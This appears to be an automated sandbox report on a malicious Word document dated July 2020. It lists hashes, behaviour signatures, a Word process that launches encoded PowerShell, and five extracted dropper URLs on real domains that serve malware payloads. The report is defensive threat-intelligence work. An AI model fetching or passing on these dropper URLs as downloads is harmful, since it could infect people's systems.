Resubmissions

17-07-2020 17:34

200717-11ew4vhpq6 10

17-07-2020 17:19

200717-bsfqa8665j 8

Analysis

  • max time kernel
    60s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    17-07-2020 17:34

General

  • Target

    7bf808ea3b70583a98b450b147880dd741c863b82bd064df6f773a9562a5a6b1.doc

  • Size

    188KB

  • MD5

    916161ce414c12d8c489a44c9cd81026

  • SHA1

    b919f28eb70f4c84de1715d9b70489d172153004

  • SHA256

    7bf808ea3b70583a98b450b147880dd741c863b82bd064df6f773a9562a5a6b1

  • SHA512

    dd814df4b53b99eb4287cfe3bb9772eab728d516d43a36621a6bd2106018324fe6d2dc1321717158d32ec4cd996b2194e21cb05c78604c1b4de0abae23a6fe85

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • exe.dropper
    https://ramukakaonline.com/wp-includes/cxSzmSXN/
  • exe.dropper
    http://shubhinfoways.com/p/XEcc5x1qx73/
  • exe.dropper
    http://test2.cxyw.net/hyeht3/aWybkzi/
  • exe.dropper
    http://sustainableandorganicgarments.com/komentarz/KHF6ry92657/
  • exe.dropper
    http://staging.icuskin.com/wp-content/o5hhrj8wvfv372729/

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7bf808ea3b70583a98b450b147880dd741c863b82bd064df6f773a9562a5a6b1.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1144
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e 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
    1⤵
    • Process spawned unexpected child process
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:1056

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1144-0-0x0000000006D50000-0x0000000006E50000-memory.dmp

    Filesize

    1024KB

  • memory/1144-2-0x0000000008D00000-0x0000000008D04000-memory.dmp

    Filesize

    16KB

  • memory/1144-5-0x000000000B2D0000-0x000000000B2D4000-memory.dmp

    Filesize

    16KB

  • memory/1144-6-0x000000000C350000-0x000000000C354000-memory.dmp

    Filesize

    16KB

  • memory/1144-8-0x0000000002100000-0x0000000002101000-memory.dmp

    Filesize

    4KB